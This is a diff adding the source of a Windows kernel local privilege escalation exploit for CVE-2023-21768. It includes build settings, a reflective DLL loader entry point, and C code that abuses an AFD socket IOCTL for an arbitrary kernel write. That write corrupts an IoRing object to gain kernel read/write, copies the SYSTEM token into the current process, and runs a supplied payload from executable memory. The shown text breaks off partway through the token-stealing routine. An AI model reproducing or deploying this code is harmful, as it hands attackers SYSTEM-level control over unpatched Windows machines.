+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+    <IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <GenerateManifest>false</GenerateManifest>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;CVE202321768_EXPORTS;_WINDOWS;_USRDLL;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;CVE202321768_EXPORTS;_WINDOWS;_USRDLL;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;CVE202321768_EXPORTS;_WINDOWS;_USRDLL;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>
+      </SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;CVE202321768_EXPORTS;_WINDOWS;_USRDLL;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>false</ConformanceMode>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <TreatWarningAsError>true</TreatWarningAsError>
+      <InlineFunctionExpansion>AnySuitable</InlineFunctionExpansion>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <Optimization>MinSpace</Optimization>
+      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.c" />
+    <ClCompile Include="exploit.c" />
+    <ClCompile Include="ioring.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="exploit.h" />
+    <ClInclude Include="ioring.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,37 @@
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "ReflectiveLoader.c"
+
+#include <stdio.h>
+#include <stdint.h>
+#include <windows.h>
+
+DWORD Exploit(PVOID pPayload);
+
+LPVOID main(LPVOID lpReserved) {
+	Exploit(lpReserved);
+	return;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+		{
+			*(HMODULE*)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		main(lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return TRUE;
+}
@@ -0,0 +1,214 @@
+#include <windows.h>
+#include "exploit.h"
+#include "ioring.h"
+
+BOOL InitialSetup(void) {
+	HMODULE hNtdll = LoadLibrary(L"ntdll");
+
+	if (!hNtdll) {
+		dprintf("Unable to load ntdll.dll");
+		goto failure;
+	}
+	
+	if (!(NtCreateFile = (fNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"))) {
+		dprintf("NtCreateFile() not found in ntdll.dll");
+		goto failure;
+	}
+
+	if (!(NtDeviceIoControlFile = (fNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"))) {
+		dprintf("NtDeviceIoControlFile() not found in ntdll.dll");
+		goto failure;
+	}
+
+	if (!(NtCreateIoCompletion = (fNtCreateIoCompletion)GetProcAddress(hNtdll, "NtCreateIoCompletion"))) {
+		dprintf("NtCreateIoCompletion() not found in ntdll.dll");
+		goto failure;
+	}
+
+	if (!(NtSetIoCompletion = (fNtSetIoCompletion)GetProcAddress(hNtdll, "NtSetIoCompletion"))) {
+		dprintf("NtSetIoCompletion() not found in ntdll.dll");
+		goto failure;
+	}
+
+	if (!(NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"))) {
+		dprintf("NtQuerySystemInformation() not found in ntdll.dll");
+		goto failure;
+	}
+
+	return TRUE;
+
+failure:
+	if (hNtdll) {
+		FreeLibrary(hNtdll);
+	}
+	return FALSE;
+}
+
+HRESULT ArbitraryKernelWrite0x1(void* pPwnPtr) {
+    HRESULT ret;
+    NTSTATUS ntStatus;
+    HANDLE hCompletion = INVALID_HANDLE_VALUE;
+    IO_STATUS_BLOCK IoStatusBlock = { 0 };
+    HANDLE hSocket = INVALID_HANDLE_VALUE;
+    UNICODE_STRING ObjectFilePath = { 0 };
+    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
+    AFD_NOTIFYSOCK_DATA Data = { 0 };
+    HANDLE hEvent = NULL;
+    HANDLE hThread = NULL;
+
+    // Hard-coded attributes for an IPv4 TCP socket
+    BYTE bExtendedAttributes[] = {
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1E, 0x00, 0x41, 0x66, 0x64, 0x4F, 0x70, 0x65, 0x6E, 0x50,
+        0x61, 0x63, 0x6B, 0x65, 0x74, 0x58, 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x60, 0xEF, 0x3D, 0x47, 0xFE
+    };
+
+    ntStatus = NtCreateIoCompletion(&hCompletion, MAXIMUM_ALLOWED, NULL, 1);
+
+    if (ntStatus != STATUS_SUCCESS) {
+        dprintf("NtCreateIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
+        ret = E_FAIL;
+        goto done;
+    }
+
+    ntStatus = NtSetIoCompletion(hCompletion, 0x1337, &IoStatusBlock, 0, 0x100);
+
+    if (ntStatus != STATUS_SUCCESS) {
+        dprintf("NtSetIoCompletion() failed (NTSTATUS=0x%X)", ntStatus);
+        ret = E_FAIL;
+        goto done;
+    }
+
+    ObjectFilePath.Buffer = (PWSTR)L"\\Device\\Afd\\Endpoint";
+    ObjectFilePath.Length = (USHORT)wcslen(ObjectFilePath.Buffer) * sizeof(wchar_t);
+    ObjectFilePath.MaximumLength = ObjectFilePath.Length;
+
+    ObjectAttributes.Length = sizeof(ObjectAttributes);
+    ObjectAttributes.ObjectName = &ObjectFilePath;
+    ObjectAttributes.Attributes = 0x40;
+
+    ntStatus = NtCreateFile(&hSocket, MAXIMUM_ALLOWED, &ObjectAttributes, &IoStatusBlock, NULL, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, 1, 0, bExtendedAttributes, sizeof(bExtendedAttributes));
+
+    if (ntStatus != STATUS_SUCCESS) {
+        dprintf("NtCreateFile() failed (NTSTATUS=0x%X)", ntStatus);
+        ret = E_FAIL;
+        goto done;
+    }
+
+    Data.hCompletion = hCompletion;
+
+    Data.pData1 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+    if (!Data.pData1) {
+        dprintf("Call #1 to VirtualAlloc() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    Data.pData2 = VirtualAlloc(NULL, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+    if (!Data.pData2) {
+        dprintf("Call #2 to VirtualAlloc() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    Data.dwCounter = 0x1;
+    Data.dwLen = 0x1;
+    Data.dwTimeout = 100000000;
+    Data.pPwnPtr = pPwnPtr;
+
+    hEvent = CreateEvent(NULL, 0, 0, NULL);
+
+    if (!hEvent) {
+        dprintf("Call to CreateEvent() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    NtDeviceIoControlFile(hSocket, hEvent, NULL, NULL, &IoStatusBlock, AFD_NOTIFYSOCK_IOCTL, &Data, 0x30, NULL, 0);
+
+    ret = S_OK;
+
+done:
+    if (hCompletion != INVALID_HANDLE_VALUE) {
+        CloseHandle(hCompletion);
+    }
+
+    if (hSocket != INVALID_HANDLE_VALUE) {
+        CloseHandle(hSocket);
+    }
+
+    if (hEvent) {
+        CloseHandle(hEvent);
+    }
+
+    if (Data.pData1) {
+        VirtualFree(Data.pData1, 0, MEM_RELEASE);
+    }
+
+    if (Data.pData2) {
+        VirtualFree(Data.pData2, 0, MEM_RELEASE);
+    }
+
+    return ret;
+}
+
+void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
+    if (!pMsfPayload) {
+        return;
+    }
+
+    PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    if (!pPayload) {
+        return;
+    }
+
+    CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
+    CreateThread(NULL, 0, pPayload, NULL, 0, NULL);
+}
+
+DWORD Exploit(PVOID pPayload) {
+    dprintf("Starting exploit...");
+
+	PIORING_OBJECT pIoRing = NULL;
+    DWORD dwPidSelf = GetCurrentProcessId();
+
+	if (!InitialSetup()) {
+		dprintf("Initial setup failure");
+		return EXIT_FAILURE;
+	}
+
+	if (IoRingSetup(&pIoRing) != S_OK) {
+		dprintf("IORING setup failed");
+		return EXIT_FAILURE;
+	}
+
+	dprintf("IoRing Obj Address at %llx", pIoRing);
+
+	if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffers + 0x3) != S_OK) {
+		dprintf("IoRing->RegBuffers overwrite failed");
+		return EXIT_FAILURE;
+	}
+
+    dprintf("IoRing->RegBuffers overwritten with address 0x1000000");
+
+    if (ArbitraryKernelWrite0x1((char*)&pIoRing->RegBuffersCount) != S_OK) {
+        dprintf("IoRing->RegBuffersCount overwrite failed");
+        return EXIT_FAILURE;
+    }
+
+    dprintf("IoRing->RegBuffersCount overwritten with 0x1");
+
+    if (IoRingLpe(dwPidSelf, 0x1000000, 0x1) != S_OK) {
+        dprintf("LPE Failed");
+        return EXIT_FAILURE;
+    }
+
+    dprintf("Current process token elevated to SYSTEM!");
+    
+    ExecutePayload(pPayload);
+    
+    dprintf("The payload has been executed");
+    
+    return EXIT_SUCCESS;
+}
@@ -0,0 +1,197 @@
+#pragma once
+
+//#define DEBUGTRACE
+
+#include <windows.h>
+#include "common.h"
+#include "definitions.h"
+
+#define EPROC_TOKEN_OFFSET 0x4b8
+
+#define SystemHandleInformation (SYSTEM_INFORMATION_CLASS)16
+
+typedef struct _OBJECT_TYPE_INFORMATION
+{
+    UNICODE_STRING TypeName;
+    ULONG TotalNumberOfObjects;
+    ULONG TotalNumberOfHandles;
+    ULONG TotalPagedPoolUsage;
+    ULONG TotalNonPagedPoolUsage;
+    ULONG TotalNamePoolUsage;
+    ULONG TotalHandleTableUsage;
+    ULONG HighWaterNumberOfObjects;
+    ULONG HighWaterNumberOfHandles;
+    ULONG HighWaterPagedPoolUsage;
+    ULONG HighWaterNonPagedPoolUsage;
+    ULONG HighWaterNamePoolUsage;
+    ULONG HighWaterHandleTableUsage;
+    ULONG InvalidAttributes;
+    GENERIC_MAPPING GenericMapping;
+    ULONG ValidAccessMask;
+    BOOLEAN SecurityRequired;
+    BOOLEAN MaintainHandleCount;
+    BOOLEAN TypeIndex;
+    CHAR ReservedByte;
+    ULONG PoolType;
+    ULONG DefaultPagedPoolCharge;
+    ULONG DefaultNonPagedPoolCharge;
+} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
+
+typedef struct _DISPATCHER_HEADER
+{
+    union
+    {
+        volatile long Lock;
+        long LockNV;
+        struct
+        {
+            unsigned char Type;
+            unsigned char Signalling;
+            unsigned char Size;
+            unsigned char Reserved1;
+        };
+        struct
+        {
+            unsigned char TimerType;
+            union
+            {
+                unsigned char TimerControlFlags;
+                struct
+                {
+                    struct
+                    {
+                        unsigned char Absolute : 1;
+                        unsigned char Wake : 1;
+                        unsigned char EncodedTolerableDelay : 6;
+                    };
+                    unsigned char Hand;
+                    union
+                    {
+                        unsigned char TimerMiscFlags;
+                        struct
+                        {
+                            unsigned char Index : 6;
+                            unsigned char Inserted : 1;
+                            volatile unsigned char Expired : 1;
+                        };
+                    };
+                };
+            };
+        };
+        struct
+        {
+            unsigned char Timer2Type;
+            union
+            {
+                unsigned char Timer2Flags;
+                struct
+                {
+                    struct
+                    {
+                        unsigned char Timer2Inserted : 1;
+                        unsigned char Timer2Expiring : 1;
+                        unsigned char Timer2CancelPending : 1;
+                        unsigned char Timer2SetPending : 1;
+                        unsigned char Timer2Running : 1;
+                        unsigned char Timer2Disabled : 1;
+                        unsigned char Timer2ReservedFlags : 2;
+                    };
+                    unsigned char Timer2ComponentId;
+                    unsigned char Timer2RelativeId;
+                };
+            };
+        };
+        struct
+        {
+            unsigned char QueueType;
+            union
+            {
+                unsigned char QueueControlFlags;
+                struct
+                {
+                    struct
+                    {
+                        unsigned char Abandoned : 1;
+                        unsigned char DisableIncrement : 1;
+                        unsigned char QueueReservedControlFlags : 6;
+                    };
+                    unsigned char QueueSize;
+                    unsigned char QueueReserved;
+                };
+            };
+        };
+        struct
+        {
+            unsigned char ThreadType;
+            unsigned char ThreadReserved;
+            union
+            {
+                unsigned char ThreadControlFlags;
+                struct
+                {
+                    struct
+                    {
+                        unsigned char CycleProfiling : 1;
+                        unsigned char CounterProfiling : 1;
+                        unsigned char GroupScheduling : 1;
+                        unsigned char AffinitySet : 1;
+                        unsigned char Tagged : 1;
+                        unsigned char EnergyProfiling : 1;
+                        unsigned char SchedulerAssist : 1;
+                        unsigned char ThreadReservedControlFlags : 1;
+                    };
+                    union
+                    {
+                        unsigned char DebugActive;
+                        struct
+                        {
+                            unsigned char ActiveDR7 : 1;
+                            unsigned char Instrumented : 1;
+                            unsigned char Minimal : 1;
+                            unsigned char Reserved4 : 2;
+                            unsigned char AltSyscall : 1;
+                            unsigned char Emulation : 1;
+                            unsigned char Reserved5 : 1;
+                        };
+                    };
+                };
+            };
+        };
+        struct
+        {
+            unsigned char MutantType;
+            unsigned char MutantSize;
+            unsigned char DpcActive;
+            unsigned char MutantReserved;
+        };
+    };
+    long SignalState;
+    LIST_ENTRY WaitListHead;
+} DISPATCHER_HEADER, * PDISPATCHER_HEADER;
+
+typedef struct _KEVENT
+{
+    struct _DISPATCHER_HEADER Header;
+} KEVENT, * PKEVENT;
+
+
+#define AFD_NOTIFYSOCK_IOCTL 0x12127
+
+// Good enough™ best guess on what this structure is.
+typedef struct AFD_NOTIFYSOCK_DATA
+{
+    HANDLE hCompletion;
+    PVOID pData1;
+    PVOID pData2;
+    PVOID pPwnPtr;
+    DWORD dwCounter;
+    DWORD dwTimeout;
+    DWORD dwLen;
+    char lol[0x4];
+}AFD_NOTIFYSOCK_DATA;
+
+fNtCreateFile NtCreateFile;
+fNtDeviceIoControlFile NtDeviceIoControlFile;
+fNtCreateIoCompletion NtCreateIoCompletion;
+fNtSetIoCompletion NtSetIoCompletion;
+fNtQuerySystemInformation NtQuerySystemInformation;
@@ -0,0 +1,275 @@
+#include <windows.h>
+#include "ioring.h"
+
+HIORING hIoRing = NULL;
+PIORING_OBJECT pIoRing = NULL;
+HANDLE hInPipe = INVALID_HANDLE_VALUE;
+HANDLE hOutPipe = INVALID_HANDLE_VALUE;
+HANDLE hInPipeClient = INVALID_HANDLE_VALUE;
+HANDLE hOutPipeClient = INVALID_HANDLE_VALUE;
+
+HRESULT GetObjPtr(PVOID* ppObjAddr, ULONG ulPid, HANDLE handle) {
+    HRESULT ret;
+    PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;
+    ULONG ulBytes = 0;
+    NTSTATUS ntStatus = STATUS_SUCCESS;
+
+    while ((ntStatus = NtQuerySystemInformation(SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH) {
+        if (pHandleInfo) {
+            pHandleInfo = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, 2 * (SIZE_T) ulBytes);
+        } else {
+            pHandleInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * (SIZE_T) ulBytes);
+        }
+    }
+
+    if (ntStatus != STATUS_SUCCESS) {
+        dprintf("NtQuerySystemInformation() failed (NTSTATUS=0x%X)", ntStatus);
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (pHandleInfo == NULL) {
+        dprintf("Heap memory allocation failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++) {
+        if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (USHORT) handle)) {
+            *ppObjAddr = pHandleInfo->Handles[i].Object;
+            ret = S_OK;
+            break;
+        }
+    }
+
+done:
+    if (pHandleInfo) {
+        HeapFree(GetProcessHeap(), 0, pHandleInfo);
+    }
+    return ret;
+}
+
+HRESULT IoRingSetup(PIORING_OBJECT* ppIoRingAddr) {
+    IORING_CREATE_FLAGS ioRingFlags = { 0 };
+
+    ioRingFlags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
+    ioRingFlags.Advisory = IORING_CREATE_REQUIRED_FLAGS_NONE;
+
+    if (CreateIoRing(IORING_VERSION_3, ioRingFlags, 0x10000, 0x20000, &hIoRing) != S_OK) {
+        dprintf("Call to CreateIoRing() failed (0x%X)", GetLastError());
+        return E_FAIL;
+    }
+
+    if (GetObjPtr(ppIoRingAddr, GetCurrentProcessId(), *(PHANDLE)hIoRing) != S_OK) {
+        dprintf("Failed to get the IoRing object address");
+        return E_FAIL;
+    }
+
+    pIoRing = *ppIoRingAddr;
+
+    hInPipe = CreateNamedPipe(L"\\\\.\\pipe\\ioring_in", PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
+    hOutPipe = CreateNamedPipe(L"\\\\.\\pipe\\ioring_out", PIPE_ACCESS_DUPLEX, PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
+
+    if ((hInPipe == INVALID_HANDLE_VALUE) || (hOutPipe == INVALID_HANDLE_VALUE)) {
+        dprintf("Named pipe creation failure (0x%X)", GetLastError());
+        return E_FAIL;
+    }
+
+    hInPipeClient = CreateFile(L"\\\\.\\pipe\\ioring_in", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+    hOutPipeClient = CreateFile(L"\\\\.\\pipe\\ioring_out", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    if ((hInPipeClient == INVALID_HANDLE_VALUE) || (hOutPipeClient == INVALID_HANDLE_VALUE)) {
+        dprintf("Error while opening named pipes (0x%X)", GetLastError());
+        return E_FAIL;
+    }
+
+    return S_OK;
+}
+
+HRESULT IoRingRead(PULONG64 pRegisterBuffers, ULONG64 pReadAddr, PVOID pReadBuffer, ULONG ulReadLen) {
+    HRESULT ret;
+    PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
+    IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hOutPipeClient);
+    IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
+    IORING_CQE cqe = { 0 };
+
+    pMcBufferEntry = VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
+
+    if (!pMcBufferEntry) {
+        dprintf("Call to VirtualAlloc() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    pMcBufferEntry->Address = (PVOID)pReadAddr;
+    pMcBufferEntry->Length = ulReadLen;
+    pMcBufferEntry->Type = 0xc02;
+    pMcBufferEntry->Size = 0x80;
+    pMcBufferEntry->AccessMode = 1;
+    pMcBufferEntry->ReferenceCount = 1;
+
+    pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
+
+    if (BuildIoRingWriteFile(hIoRing, reqFile, reqBuffer, ulReadLen, 0, FILE_WRITE_FLAGS_NONE, (UINT_PTR)NULL, IOSQE_FLAGS_NONE) != S_OK) {
+        dprintf("Call to BuildIoRingWriteFile() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (SubmitIoRing(hIoRing, 0, 0, NULL) != S_OK) {
+        dprintf("Call to SubmitIoRing() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (PopIoRingCompletion(hIoRing, &cqe) != S_OK) {
+        dprintf("Call to PopIoRingCompletion() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (cqe.ResultCode != S_OK) {
+        ret = cqe.ResultCode;
+        dprintf("the I/O ring operation failed (ResultCode=0x%X)", ret);
+        goto done;
+    }
+
+    if (!ReadFile(hOutPipe, pReadBuffer, ulReadLen, NULL, NULL)) {
+        dprintf("Call to ReadFile() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    ret = S_OK;
+
+done:
+    if (pMcBufferEntry) {
+        VirtualFree(pMcBufferEntry, 0, MEM_RELEASE);
+    }
+    return ret;
+}
+
+HRESULT IoRingWrite(PULONG64 pRegisterBuffers, ULONG64 pWriteAddr, PVOID pWriteBuffer, ULONG ulWriteLen) {
+    HRESULT ret;
+    PIOP_MC_BUFFER_ENTRY pMcBufferEntry = NULL;
+    IORING_HANDLE_REF reqFile = IoRingHandleRefFromHandle(hInPipeClient);
+    IORING_BUFFER_REF reqBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
+    IORING_CQE cqe = { 0 };
+
+    if (!WriteFile(hInPipe, pWriteBuffer, ulWriteLen, NULL, NULL))
+    {
+        dprintf("Call to WriteFile() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    pMcBufferEntry = VirtualAlloc(NULL, sizeof(IOP_MC_BUFFER_ENTRY), MEM_COMMIT, PAGE_READWRITE);
+
+    if (!pMcBufferEntry)
+    {
+        dprintf("Call to VirtualAlloc() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    pMcBufferEntry->Address = (PVOID)pWriteAddr;
+    pMcBufferEntry->Length = ulWriteLen;
+    pMcBufferEntry->Type = 0xc02;
+    pMcBufferEntry->Size = 0x80;
+    pMcBufferEntry->AccessMode = 1;
+    pMcBufferEntry->ReferenceCount = 1;
+
+    pRegisterBuffers[0] = (ULONG64)pMcBufferEntry;
+
+    if (BuildIoRingReadFile(hIoRing, reqFile, reqBuffer, ulWriteLen, 0, (UINT_PTR)NULL, IOSQE_FLAGS_NONE) != S_OK) {
+        dprintf("Call to BuildIoRingReadFile() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (SubmitIoRing(hIoRing, 0, 0, NULL) != S_OK) {
+        dprintf("Call to SubmitIoRing() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (PopIoRingCompletion(hIoRing, &cqe) != S_OK) {
+        dprintf("Call to PopIoRingCompletion() failed (0x%X)", GetLastError());
+        ret = E_FAIL;
+        goto done;
+    }
+
+    if (cqe.ResultCode != S_OK) {
+        ret = cqe.ResultCode;
+        dprintf("the I/O ring operation failed (ResultCode=0x%X)", ret);
+        goto done;
+    }
+
+    ret = S_OK;
+
+done:
+    if (pMcBufferEntry) {
+        VirtualFree(pMcBufferEntry, 0, MEM_RELEASE);
+    }
+    return ret;
+}
+
+HRESULT IoRingLpe(ULONG pid, ULONG64 ullFakeRegBufferAddr, ULONG ulFakeRegBufferCnt) {
+    HANDLE hProc = NULL;
+    ULONG64 ullSystemEPROCaddr = 0;
+    ULONG64 ullTargEPROCaddr = 0;
+    PVOID pFakeRegBuffers = NULL;
+    _HIORING* phIoRing = NULL;
+    ULONG64 ullSysToken = 0;
+    char null[0x10] = { 0 };
+
+    hProc = OpenProcess(PROCESS_QUERY_INFORMATION, 0, pid);
+
+    if (!hProc) {
+        dprintf("Call to OpenProcess() failed (0x%X)", GetLastError());
+        return E_FAIL;
+    }
+
+    if (GetObjPtr((PVOID*)&ullSystemEPROCaddr, 4, (HANDLE)4) != S_OK) {
+        dprintf("Unable to get System EPROC address");
+        return E_FAIL;
+    }
+
